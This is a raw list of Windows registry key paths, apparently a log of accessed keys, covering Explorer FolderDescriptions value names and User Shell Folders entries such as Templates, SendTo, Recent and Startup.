HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{9274BD8D-CFD1-41C3-B35E-B13F55A758F4}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\PrintHood
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A63293E8-664E-48DB-A079-DF759E0509F7}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Templates
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{FD228CB7-AE11-4AE3-864C-16F3910AB8FE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\NetHood
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{8983036C-27C0-404B-8F08-102D10DCFD74}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\SendTo
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{AE50C081-EBD2-438A-8655-8A092E34987A}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Recent
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B97D20BB-F46A-4C97-BA10-5E3608430854}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\RelativePath
